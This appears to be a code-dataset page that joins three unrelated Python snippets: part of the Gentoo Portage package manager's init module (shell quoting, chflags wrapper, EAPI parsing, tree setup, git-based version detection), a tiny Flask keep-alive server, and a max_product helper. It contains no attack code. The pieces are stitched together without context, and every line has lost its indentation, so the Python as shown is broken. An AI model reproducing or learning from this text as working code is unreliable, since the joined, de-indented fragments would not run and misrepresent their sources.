_bin_path = PORTAGE_BIN_PATH
_pym_path = PORTAGE_PYM_PATH
# Api consumers included in portage should set this to True.
_internal_warnings = False
_sync_disabled_warnings = False
def _shell_quote(s):
"""
Quote a string in double-quotes and use backslashes to
escape any backslashes, double-quotes, dollar signs, or
backquotes in the string.
"""
for letter in "\\\"$`":
if letter in s:
s = s.replace(letter, "\\" + letter)
return "\"%s\"" % s
bsd_chflags = None
if platform.system() in ('FreeBSD',):
class bsd_chflags(object):
@classmethod
def chflags(cls, path, flags, opts=""):
cmd = ['chflags']
if opts:
cmd.append(opts)
cmd.append('%o' % (flags,))
cmd.append(path)
encoding = _encodings['fs']
if sys.hexversion < 0x3000000 or sys.hexversion >= 0x3020000:
# Python 3.1 does not support bytes in Popen args.
cmd = [_unicode_encode(x, encoding=encoding, errors='strict')
for x in cmd]
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
output = proc.communicate()[0]
status = proc.wait()
if os.WIFEXITED(status) and os.WEXITSTATUS(status) == os.EX_OK:
return
# Try to generate an ENOENT error if appropriate.
if 'h' in opts:
_os_merge.lstat(path)
else:
_os_merge.stat(path)
# Make sure the binary exists.
if not portage.process.find_binary('chflags'):
raise portage.exception.CommandNotFound('chflags')
# Now we're not sure exactly why it failed or what
# the real errno was, so just report EPERM.
output = _unicode_decode(output, encoding=encoding)
e = OSError(errno.EPERM, output)
e.errno = errno.EPERM
e.filename = path
e.message = output
raise e
@classmethod
def lchflags(cls, path, flags):
return cls.chflags(path, flags, opts='-h')
def load_mod(name):
modname = ".".join(name.split(".")[:-1])
mod = __import__(modname)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
def getcwd():
"this fixes situations where the current directory doesn't exist"
try:
return os.getcwd()
except OSError: #dir doesn't exist
os.chdir("/")
return "/"
getcwd()
def abssymlink(symlink, target=None):
"This reads symlinks, resolving the relative symlinks, and returning the absolute."
if target is not None:
mylink = target
else:
mylink = os.readlink(symlink)
if mylink[0] != '/':
mydir=os.path.dirname(symlink)
mylink=mydir+"/"+mylink
return os.path.normpath(mylink)
_doebuild_manifest_exempt_depend = 0
_testing_eapis = frozenset(["4-python", "4-slot-abi", "5-progress", "5-hdepend"])
_deprecated_eapis = frozenset(["4_pre1", "3_pre2", "3_pre1", "5_pre1", "5_pre2"])
def _eapi_is_deprecated(eapi):
return eapi in _deprecated_eapis
def eapi_is_supported(eapi):
if not isinstance(eapi, basestring):
# Only call str() when necessary since with python2 it
# can trigger UnicodeEncodeError if EAPI is corrupt.
eapi = str(eapi)
eapi = eapi.strip()
if _eapi_is_deprecated(eapi):
return True
if eapi in _testing_eapis:
return True
try:
eapi = int(eapi)
except ValueError:
eapi = -1
if eapi < 0:
return False
return eapi <= portage.const.EAPI
# This pattern is specified by PMS section 7.3.1.
_pms_eapi_re = re.compile(r"^[ \t]*EAPI=(['\"]?)([A-Za-z0-9+_.-]*)\1[ \t]*([ \t]#.*)?$")
_comment_or_blank_line = re.compile(r"^\s*(#.*)?$")
def _parse_eapi_ebuild_head(f):
eapi = None
eapi_lineno = None
lineno = 0
for line in f:
lineno += 1
m = _comment_or_blank_line.match(line)
if m is None:
eapi_lineno = lineno
m = _pms_eapi_re.match(line)
if m is not None:
eapi = m.group(2)
break
return (eapi, eapi_lineno)
def _movefile(src, dest, **kwargs):
"""Calls movefile and raises a PortageException if an error occurs."""
if movefile(src, dest, **kwargs) is None:
raise portage.exception.PortageException(
"mv '%s' '%s'" % (src, dest))
auxdbkeys = (
'DEPEND', 'RDEPEND', 'SLOT', 'SRC_URI',
'RESTRICT', 'HOMEPAGE', 'LICENSE', 'DESCRIPTION',
'KEYWORDS', 'INHERITED', 'IUSE', 'REQUIRED_USE',
'PDEPEND', 'PROVIDE', 'EAPI',
'PROPERTIES', 'DEFINED_PHASES', 'HDEPEND', 'UNUSED_04',
'UNUSED_03', 'UNUSED_02', 'UNUSED_01',
)
auxdbkeylen=len(auxdbkeys)
def portageexit():
close_portdbapi_caches()
class _trees_dict(dict):
__slots__ = ('_running_eroot', '_target_eroot',)
def __init__(self, *pargs, **kargs):
dict.__init__(self, *pargs, **kargs)
self._running_eroot = None
self._target_eroot = None
def create_trees(config_root=None, target_root=None, trees=None, env=None,
eprefix=None):
if trees is not None:
# clean up any existing portdbapi instances
for myroot in trees:
portdb = trees[myroot]["porttree"].dbapi
portdb.close_caches()
portdbapi.portdbapi_instances.remove(portdb)
del trees[myroot]["porttree"], myroot, portdb
if trees is None:
trees = _trees_dict()
elif not isinstance(trees, _trees_dict):
# caller passed a normal dict or something,
# but we need a _trees_dict instance
trees = _trees_dict(trees)
if env is None:
env = os.environ
settings = config(config_root=config_root, target_root=target_root,
env=env, eprefix=eprefix)
settings.lock()
trees._target_eroot = settings['EROOT']
myroots = [(settings['EROOT'], settings)]
if settings["ROOT"] == "/":
trees._running_eroot = trees._target_eroot
else:
# When ROOT != "/" we only want overrides from the calling
# environment to apply to the config that's associated
# with ROOT != "/", so pass a nearly empty dict for the env parameter.
clean_env = {}
for k in ('PATH', 'PORTAGE_GRPNAME', 'PORTAGE_USERNAME',
'SSH_AGENT_PID', 'SSH_AUTH_SOCK', 'TERM',
'ftp_proxy', 'http_proxy', 'no_proxy',
'__PORTAGE_TEST_HARDLINK_LOCKS'):
v = settings.get(k)
if v is not None:
clean_env[k] = v
settings = config(config_root=None, target_root="/",
env=clean_env, eprefix=eprefix)
settings.lock()
trees._running_eroot = settings['EROOT']
myroots.append((settings['EROOT'], settings))
for myroot, mysettings in myroots:
trees[myroot] = portage.util.LazyItemsDict(trees.get(myroot, {}))
trees[myroot].addLazySingleton("virtuals", mysettings.getvirtuals)
trees[myroot].addLazySingleton(
"vartree", vartree, categories=mysettings.categories,
settings=mysettings)
trees[myroot].addLazySingleton("porttree",
portagetree, settings=mysettings)
trees[myroot].addLazySingleton("bintree",
binarytree, pkgdir=mysettings["PKGDIR"], settings=mysettings)
return trees
if VERSION == 'HEAD':
class _LazyVersion(proxy.objectproxy.ObjectProxy):
def _get_target(self):
global VERSION
if VERSION is not self:
return VERSION
if os.path.isdir(os.path.join(PORTAGE_BASE_PATH, '.git')):
encoding = _encodings['fs']
cmd = [BASH_BINARY, "-c", ("cd %s ; git describe --tags || exit $? ; " + \
"if [ -n \"`git diff-index --name-only --diff-filter=M HEAD`\" ] ; " + \
"then echo modified ; git rev-list --format=%%ct -n 1 HEAD ; fi ; " + \
"exit 0") % _shell_quote(PORTAGE_BASE_PATH)]
if sys.hexversion < 0x3000000 or sys.hexversion >= 0x3020000:
# Python 3.1 does not support bytes in Popen args.
cmd = [_unicode_encode(x, encoding=encoding, errors='strict')
for x in cmd]
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
output = _unicode_decode(proc.communicate()[0], encoding=encoding)
status = proc.wait()
if os.WIFEXITED(status) and os.WEXITSTATUS(status) == os.EX_OK:
output_lines = output.splitlines()
if output_lines:
version_split = output_lines[0].split('-')
if version_split:
VERSION = version_split[0].lstrip('v')
patchlevel = False
if len(version_split) > 1:
patchlevel = True
VERSION = "%s_p%s" %(VERSION, version_split[1])
if len(output_lines) > 1 and output_lines[1] == 'modified':
head_timestamp = None
if len(output_lines) > 3:
try:
head_timestamp = long(output_lines[3])
except ValueError:
pass
timestamp = long(time.time())
if head_timestamp is not None and timestamp > head_timestamp:
timestamp = timestamp - head_timestamp
if not patchlevel:
VERSION = "%s_p0" % (VERSION,)
VERSION = "%s_p%d" % (VERSION, timestamp)
return VERSION
VERSION = 'HEAD'
return VERSION
VERSION = _LazyVersion()
if "_legacy_globals_constructed" in globals():
# The module has been reloaded, so perform any relevant cleanup
# and prevent memory leaks.
if "db" in _legacy_globals_constructed:
try:
db
except NameError:
pass
else:
if isinstance(db, dict) and db:
for _x in db.values():
try:
if "porttree" in _x.lazy_items:
continue
except (AttributeError, TypeError):
continue
try:
_x = _x["porttree"].dbapi
except (AttributeError, KeyError):
continue
if not isinstance(_x, portdbapi):
continue
_x.close_caches()
try:
portdbapi.portdbapi_instances.remove(_x)
except ValueError:
pass
del _x
class _LegacyGlobalProxy(proxy.objectproxy.ObjectProxy):
__slots__ = ('_name',)
def __init__(self, name):
proxy.objectproxy.ObjectProxy.__init__(self)
object.__setattr__(self, '_name', name)
def _get_target(self):
name = object.__getattribute__(self, '_name')
from portage._legacy_globals import _get_legacy_global
return _get_legacy_global(name)
_legacy_global_var_names = ("archlist", "db", "features",
"groups", "mtimedb", "mtimedbfile", "pkglines",
"portdb", "profiledir", "root", "selinux_enabled",
"settings", "thirdpartymirrors")
for k in _legacy_global_var_names:
globals()[k] = _LegacyGlobalProxy(k)
del k
_legacy_globals_constructed = set()
def _disable_legacy_globals():
"""
This deletes the ObjectProxy instances that are used
for lazy initialization of legacy global variables.
The purpose of deleting them is to prevent new code
from referencing these deprecated variables.
"""
global _legacy_global_var_names
for k in _legacy_global_var_names:
globals().pop(k, None)
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return ("I'm simping :}", 200, None)
def run():
app.run(host='0.0.0.0',port=8081)
def keep_alive():
t = Thread(target=run)
t.start()
|
def max_product(nums):
biggest = second_biggest = 0
for num in nums:
gt_second_biggest = num > second_biggest
if gt_second_biggest and num > biggest:
second_biggest, biggest = biggest, num
elif gt_second_biggest:
second_biggest = num
return second_biggest * biggest
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.